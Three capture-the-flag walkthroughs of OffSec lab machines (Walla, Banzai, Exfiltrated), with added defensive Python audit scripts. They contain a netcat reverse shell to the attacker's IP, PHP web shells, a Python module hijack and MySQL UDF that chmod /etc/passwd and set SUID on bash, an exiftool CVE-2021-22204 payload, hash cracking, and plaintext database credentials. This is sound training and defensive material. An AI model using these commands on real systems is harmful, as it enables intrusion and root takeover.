Offensive Security PG Practice: Walla – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Walla
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 15 March 2021
Author: OffSec
Difficulty Stated: Intermediate
Difficulty I found: Intermediate
CTF or Real-life: Mix
Learning out of the box: Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, default credentials vulnerability, CVE-2020-24572 exploitation, reverse shell, privilege escalation via a hijacked Python module.

Nmap found a number of open TCP ports.

nmap -r -v --min-rate=1500 -p- -oN 001-nmap-tcp-full 192.168.173.97

We used the following pipeline to pull the TCP port numbers out of the scan output into a comma-separated list.

cat 001-nmap-tcp-full | grep "/tcp" | cut -d "/" -f1 | tr "\n" ","

Then we ran Nmap again against only the open ports, with default scripts and version detection, to gather more information.

nmap -r -v -sC -sV -p 22,23,25,53,422,8091,42042 -oN 002-nmap-tcp-sel 192.168.173.97
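As an added example (not part of the original writeup), here is a small Python parser for Nmap's normal output (-oN) that does the job of the cat/grep/cut/tr pipeline above but keeps only ports whose state is open, skips closed or filtered entries, and emits no trailing comma, so the result can be passed straight to nmap -p. The scan text embedded below is constructed for the example; the host 10.0.0.5, the port states and the service banners are placeholders, not the real scan results.

```python
"""Extract open ports from an Nmap normal-output (-oN) file."""
import re
import sys

# Constructed sample of an -oN file (host, versions and states are made up).
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.91 scan initiated as: nmap -r -v -sC -sV -p 22,23,25,53,422,8091,42042 -oN 002-nmap-tcp-sel 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.045s latency).

PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
23/tcp    open     telnet   Linux telnetd
25/tcp    open     smtp     Postfix smtpd
53/tcp    closed   domain
422/tcp   open     ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8091/tcp  open     http     lighttpd 1.4.53
|_http-title: 401 Unauthorized
42042/tcp filtered unknown
111/udp   open     rpcbind  2-4 (RPC #100000)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
"""

# "<port>/<proto>  <state>  [<service> ...]" are the only lines we care about;
# the PORT/STATE header and the NSE "|_" lines never match.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)(?:\s+(\S+))?")


def parse_port_lines(text):
    """Return (port, proto, state, service) for every port line, whatever the
    state, so callers decide what to keep."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service = m.groups()
            found.append((int(port), proto, state, service or ""))
    return found


def open_ports(text, proto="tcp"):
    """Ports reported as 'open' for one protocol, in the order Nmap listed them."""
    return [p for p, pr, state, _ in parse_port_lines(text)
            if pr == proto and state == "open"]


def nmap_port_arg(text, proto="tcp"):
    """Comma-separated list ready for `nmap -p ...`, with no trailing comma."""
    return ",".join(str(p) for p in open_ports(text, proto))


if __name__ == "__main__":
    # Usage: python nmap_open_ports.py 001-nmap-tcp-full   (defaults to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    print(nmap_port_arg(text))
```

The grep "/tcp" pipeline on the page would also pick up closed and filtered lines (53 and 42042 in the sample), which is harmless for a port list but wastes time on the scripted second pass; filtering on the state column avoids that.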

We found several SSH services presenting identical host keys, which was a bit strange. Trying default credentials against Telnet gave no success.

Running gobuster against the web server found nothing fruitful.

gobuster dir -e -w /usr/share/wordlists/dirb/big.txt -t 3 -u http://192.168.173.97:8091 | tee 200_gobuster_log

Visited the web server on port 8091, but it had HTTP basic authentication in place.

Googling "RaspAP" showed that it is a web interface for managing a wireless router/access point.

Various forums revealed that its default credentials are "admin:secret".

So we used those credentials and got in.

Identified the version to be 2.5.

CVE-2020-24572 is a command injection vulnerability affecting this version of RaspAP.

Although there are public exploits out, I used the manual way of getting a reverse shell.

nc <Your VPN IP> <Your Listening Port> -e /bin/sh &

And we had a shell as www-data.

Next, we upgraded our shell to a full TTY:

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

stty raw -echo
fg
fg

export SHELL=bash
export TERM=xterm
stty rows <your row numbers> columns <your col numbers>
reset

Read the user flag.

The current user 'www-data' can run a number of sudo commands, and wifi_reset.py looked like a custom one.

sudo -l

wifi_reset.py imported a module named wificontroller and called functions from it, but no wificontroller module existed anywhere on the system. Since Python searches the script's own directory before anything else, whatever file of that name sits next to wifi_reset.py gets imported.

So we created our own wificontroller.py in the same folder, /home/walter, containing the privilege escalation code below, and ran wifi_reset.py through sudo.

import os

# wifi_reset.py (run via sudo, so as root) calls these three functions;
# each body just runs a privileged shell command.
def stop(text, value):
    os.system("chmod 777 /etc/passwd")

def reset(text, value):
    os.system("chmod +s /bin/bash")

def start(text, value):
    os.system("chmod 777 /etc/shadow")

Executing it gave the following results.

/bin/bash now has the SUID bit set, so we became root with the following command and read the root flag.

/bin/bash -p 
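The escalation above works because a sudo-allowed script imports a name that nothing on the system provides, and the script's own directory is the first place Python looks. As an added example (not from the writeup or from RaspAP), the audit script below checks any Python script that can be run with elevated privileges for that pattern: it parses the script's imports with `ast`, resolves each name the way the interpreter would, and reports imports that are unresolved or that are served from a directory a non-root user could write to. The `demo()` function rebuilds the walkthrough's situation in a temporary directory with a constructed `wifi_reset.py`; the module name wificontroller and the 0o777 directory mode are taken from the page and from the example's own assumptions, and nothing in the temporary directory is ever executed.

```python
"""Audit a privileged Python script for the module-hijack pattern: an import
that nothing provides, or one that resolves from a writable directory."""
from __future__ import annotations

import ast
import importlib.util
import os
import stat
import sys
import tempfile


def top_level_imports(source):
    """Top-level module names a script imports (`import a.b` -> 'a',
    `from c import d` -> 'c'); relative imports are skipped."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def resolve_import(name, search_dirs):
    """Directory that would satisfy `import name` (first hit wins, as the
    interpreter searches), '<interpreter>' for built-in/frozen modules, or None
    when nothing provides it: the script fails today and will pick up any file
    of that name later dropped into search_dirs[0]."""
    for d in search_dirs:
        if (os.path.isfile(os.path.join(d, name + ".py"))
                or os.path.isfile(os.path.join(d, name, "__init__.py"))):
            return d
    try:
        spec = importlib.util.find_spec(name)   # stdlib, site-packages, builtins
    except (ImportError, ValueError):
        spec = None
    if spec is None:
        return None
    if spec.origin in (None, "built-in", "frozen"):
        return "<interpreter>"
    return os.path.dirname(spec.origin)


def loosely_writable(path):
    """True when a non-root user could plant a file here: the directory is
    writable by group or others, or is not owned by root."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)) or st.st_uid != 0


def audit_script(script_path):
    """Report unresolved imports and imports served from writable directories.
    The script's own directory is searched first, matching `python script.py`."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    search_dirs = [script_dir] + [p for p in sys.path if p]
    with open(script_path) as fh:
        imports = sorted(top_level_imports(fh.read()))
    report = {"imports": imports, "unresolved": [], "from_writable_dir": [],
              "writable_dirs": [d for d in search_dirs if loosely_writable(d)]}
    for name in imports:
        where = resolve_import(name, search_dirs)
        if where is None:
            report["unresolved"].append(name)
        elif where in report["writable_dirs"]:
            report["from_writable_dir"].append(name)
    return report


def demo():
    """Constructed scenario: a script importing a module that does not exist,
    then the same script once a file of that name appears beside it."""
    base = tempfile.mkdtemp()
    os.chmod(base, 0o777)          # world-writable, like a home dir anyone can write to
    script = os.path.join(base, "wifi_reset.py")
    with open(script, "w") as fh:
        fh.write("import os\nimport wificontroller\n\nwificontroller.reset('wlan0', 1)\n")
    before = audit_script(script)
    with open(os.path.join(base, "wificontroller.py"), "w") as fh:
        fh.write("# placeholder module; never executed by the audit\n")
    after = audit_script(script)
    return before, after


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print(audit_script(target))
    else:
        for label, rep in zip(("before", "after"), demo()):
            print(label, "unresolved:", rep["unresolved"],
                  "from writable dir:", rep["from_writable_dir"])
```

Running it over every script named in `sudo -l` output (as `python audit.py /path/to/script.py`) gives a quick answer to "can the low-privileged user decide what this script imports?"; a script whose only unresolved import sits in a world-writable home directory is exactly the case on this box.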

Bonus

If you're too lazy, you can use this public exploit for catching the reverse shell ¯\_(ツ)_/¯.

raspap.php holds the admin credentials (the password as a hash), unless a raspap.auth file overrides them:

<?php

$config = array(
    'admin_user' => 'admin',
    'admin_pass' => '$2y$10$YKIyWAmnQLtiJAy6QgHQ.eCpY4m.HCEbiHaTgN6.acNC6bDElzt.i'
);

if (file_exists(RASPI_CONFIG.'/raspap.auth')) {
    if ($auth_details = fopen(RASPI_CONFIG.'/raspap.auth', 'r')) {
        $config['admin_user'] = trim(fgets($auth_details));
        $config['admin_pass'] = trim(fgets($auth_details));
        fclose($auth_details);
    }
}

Let's identify the hash algorithm first.

hashid -m '$2y$10$YKIyWAmnQLtiJAy6QgHQ.eCpY4m.HCEbiHaTgN6.acNC6bDElzt.i'

We can use hashcat to crack this hash.

hashcat -a 0 -m 3200 hash_value /usr/share/wordlists/rockyou.txt
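hashid recognises the string by its modular-crypt layout, and that layout is worth knowing when you review a config file like raspap.php. As an added example (not from the writeup), the parser below splits a bcrypt string into its variant, cost, salt and digest, turns the cost into the number of rounds the KDF performs, and flags a cost below a policy minimum; the minimum of 12 is this example's own assumption, not a value from the page. The hash it parses is the one shown in raspap.php above.

```python
"""Pick apart a bcrypt string such as the admin_pass value in raspap.php."""
import re

# $<variant>$<cost>$<22-char salt><31-char digest>, using bcrypt's own
# base64 alphabet (./A-Za-z0-9); 60 characters in total.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Hash taken from the raspap.php listing above.
RASPAP_HASH = "$2y$10$YKIyWAmnQLtiJAy6QgHQ.eCpY4m.HCEbiHaTgN6.acNC6bDElzt.i"

MIN_COST = 12   # policy minimum for new hashes; an assumption of this example


def is_bcrypt(hash_str):
    """True if the string has bcrypt's modular-crypt layout."""
    return BCRYPT_RE.match(hash_str) is not None


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raises ValueError otherwise."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt modular-crypt string")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": variant,          # 2a / 2b / 2y: same algorithm, historical prefixes
        "cost": cost,                # log2 of the key-setup iterations
        "rounds": 2 ** cost,         # 10 -> 1024 expensive key setups per guess
        "salt": salt,
        "digest": digest,
        "hashcat_mode": 3200,        # hashcat's bcrypt mode, as used above
    }


def cost_findings(hash_str, minimum=MIN_COST):
    """Human-readable policy findings for one stored hash."""
    if not is_bcrypt(hash_str):
        return ["not bcrypt: unsalted or fast hashes are far cheaper to crack"]
    info = parse_bcrypt(hash_str)
    if info["cost"] < minimum:
        return [f"cost {info['cost']} below minimum {minimum} "
                f"({info['rounds']} rounds per guess)"]
    return []


if __name__ == "__main__":
    print(parse_bcrypt(RASPAP_HASH))
    print(cost_findings(RASPAP_HASH))
```

Cost 10 means 1024 iterations of bcrypt's key setup per candidate, which is why a dictionary attack with rockyou.txt is slow but still feasible for a weak password; a stronger password, not a higher cost alone, is what stops the hashcat run above.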

The SSH configuration specifies three listening ports.

There are no iptables rules.

Offensive Security PG Practice: Banzai – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Banzai
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 03 Sep 2020
Author: OffSec
Difficulty Stated: Intermediate
Difficulty I found: Intermediate
CTF or Real-life: Kind of Real life
Learning out of the box: Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, default credentials vulnerability, reverse shell, privilege escalation via MySQL User-Defined Function (UDF) dynamic library exploitation.

Nmap found a lot of open TCP ports.

nmap -r -v --min-rate=1500 -p- -oN 001-nmap-full 192.168.74.56

We tried common default credentials against PostgreSQL (port 5432) without success.

psql -h 192.168.140.56 -p 5432 -U admin -W

Running gobuster against the web servers on ports 8295 and 8080 also didn't give us anything fruitful.

We tried the default FTP credentials "admin:admin" and got in. ^_^

Since the FTP root was the web directory, we uploaded a small PHP web shell, myrce.php.

<?php system($_GET['cmd']); ?>

And we got RCE (remote code execution).

Grabbed a Python-based reverse shell from here and popped the box.

Read the local flag.

We found that MySQL was running as the root user.

ps -aux | grep root | grep sql

And we found the MySQL credentials in a config file:

<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

Now we'll use the raptor_udf library (from here) to get code execution as root through MySQL.

Download the raptor C source to Banzai and compile it into a shared library.

gcc -g -c raptor_udf.c
gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc

Next, log in to MySQL and perform the following steps.

use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
select * from mysql.func;
select do_system('chmod 777 /etc/passwd');

Now anyone can modify /etc/passwd, so we added a new user skinny1 with password 123 and root-level privileges.

Read the root flag.
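Both escalations so far end the same way: /etc/passwd (and, on Walla, /etc/shadow) made world-writable, a root-level account appended with its hash stored inline, and on Walla a setuid /bin/bash. As an added example (not from either writeup), the audit below parses passwd-format text and reports exactly those footprints, then checks file modes the way a host-integrity job would. The sample passwd text, the skinny1 line with its fake hash, and the expected Debian modes (0644 for passwd, 0640 for shadow) are constructed for the example.

```python
"""Look for the traces the /etc/passwd escalations above leave behind: a
world-writable password file, an extra UID 0 account, a hash stored inline
in /etc/passwd instead of /etc/shadow, and a setuid shell."""
import os
import stat

# Constructed sample; the last line mimics an account appended by an attacker
# (fake hash, UID/GID 0, root's home and shell).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
walter:x:1000:1000:Walter:/home/walter:/bin/bash
skinny1:$6$constructedsalt$NOTAREALHASH:0:0::/root:/bin/bash
"""

# Debian defaults; treat as an assumption and adjust per distribution.
EXPECTED_MODES = {"/etc/passwd": 0o644, "/etc/shadow": 0o640}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; rejects malformed lines loudly."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home, "shell": shell})
    return entries


def account_findings(entries):
    """(account, issue) pairs for entries that should not look like this."""
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid 0 but not root"))
        pw = e["password"]
        if pw == "":
            findings.append((e["name"], "empty password field (no password needed)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # 'x' defers to /etc/shadow; '*' and '!...' are locked accounts.
            findings.append((e["name"], "password hash stored in /etc/passwd"))
    return findings


def mode_findings(path, mode):
    """Permission drift of a file, given its st_mode (e.g. from os.stat)."""
    perms = stat.S_IMODE(mode)
    findings = []
    if perms & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} writable by group/others ({perms:04o})")
    expected = EXPECTED_MODES.get(path)
    if expected is not None and perms != expected:
        findings.append(f"{path} mode {perms:04o}, expected {expected:04o}")
    return findings


def is_setuid(mode):
    """True if the setuid bit is set (what `chmod +s /bin/bash` leaves behind)."""
    return bool(mode & stat.S_ISUID)


def audit_live_system():
    """Run the same checks against the real files; returns a list of strings."""
    out = []
    with open("/etc/passwd") as fh:
        out += [f"{name}: {issue}" for name, issue in account_findings(parse_passwd(fh.read()))]
    for path in EXPECTED_MODES:
        if os.path.exists(path):
            out += mode_findings(path, os.stat(path).st_mode)
    for shell in ("/bin/bash", "/bin/sh", "/bin/dash"):
        if os.path.exists(shell) and is_setuid(os.stat(shell).st_mode):
            out.append(f"{shell} is setuid")
    return out


if __name__ == "__main__":
    for name, issue in account_findings(parse_passwd(SAMPLE_PASSWD)):
        print("sample:", name, issue)
    print(*audit_live_system(), sep="\n")
```

Run from cron or a config-management agent, these checks turn the tell-tale signs of both boxes (a 0777 passwd file, a second UID 0 user, a setuid shell) into alerts within minutes of the change.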

Offensive Security PG Practice: Exfiltrated – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Exfiltrated
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 06 Sep 2021
Author: Naqi ‘Enox’ Ansari
Difficulty Stated: Easy
Difficulty I found: Intermediate
CTF or Real-life: Kind of Real life
Learning out of the box: Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, arbitrary file upload and remote code execution vulnerability CVE-2018-19422, privilege escalation via arbitrary code execution CVE-2021-22204.

Nmap only showed two open TCP ports, 22 and 80.

nmap -r -v --min-rate 1000 -p- -oN 001-nmap-tcp-all-ports 192.168.250.163

We further enumerated these two ports for service/version details.

nmap -r -v -sC -sV -p 22,80 -oN 002-nmap-tcp-selected 192.168.250.163

Added the IP and domain to our /etc/hosts file.

Visited the website and immediately noticed the CMS it was built on (Subrion CMS).

robots.txt listed some interesting locations, so we manually visited each one.

The panel directory revealed the exact version, Subrion CMS 4.2.1, and required user credentials.

We successfully logged in by using default credentials admin:admin.

Exploit-DB and many online forums have a public exploit for this version of Subrion CMS.

But we created our own PHP web shell saved with the .phar extension.

<?php system($_GET['cmd']); ?>

And uploaded it to the Subrion CMS.

Noted down its location (full path).

And we had successful remote code execution.

Grabbed Python3 reverse shell code from here.

And caught a reverse shell as www-data user.

LinPEAS identified a cron job being executed as the root user.

And we can verify it with pspy too.

The script was running exiftool.

At this moment I was confused/puzzled and felt slightly s**t. After spending 3-4 hours I thought maybe exiftool is vulnerable.

So, Google led me to CVE-2021-22204.

Although there are numerous articles out on exploiting this CVE, I liked and copied Amal Murali's way of exploiting the exiftool vulnerability.

Following are my steps that make /bin/bash a SUID binary.

sudo apt-get install -y djvulibre-bin
wget -qO sample.jpg placekitten.com/200
file sample.jpg
printf 'P1 1 1 1' > input.pbm
cjb2 input.pbm mask.djvu
djvumake exploit.djvu Sjbz=mask.djvu
echo -e '(metadata (copyright "\\\n" . `chmod +s /bin/bash` #"))' > input.txt
djvumake exploit.djvu Sjbz=mask.djvu ANTa=input.txt
exiftool '-GeoTiffAsciiParams<=exploit.djvu' sample.jpg
perl -0777 -pe 's/\x87\xb1/\xc5\x1b/g' < sample.jpg > exploit.jpg

We uploaded exploit.jpg to the Subrion CMS again, and after about 10-15 seconds /bin/bash had the SUID bit set.

Read the root flag first and then the user flag.

BONUS

The database credentials from the Subrion config file:

<?php
/*
 * Subrion Open Source CMS 4.2.1
 * Config file generated on 10 June 2021 12:04:54
 */

define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306'); 
define('INTELLI_DBPREFIX', 'sbr421_');

define('IA_SALT', '#5A7C224B51'); 

// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);

Apache configuration:

<VirtualHost *:80>
     ServerAdmin admin@exfiltrated.offsec
     DocumentRoot /var/www/html/subrion
     ServerName exfiltrated.offsec

     <Directory /var/www/html/subrion/>
          Options FollowSymlinks
          AllowOverride All
          Require all granted
     </Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Tried running this exploit but it fails, not sure, don't have time to debug + fix this.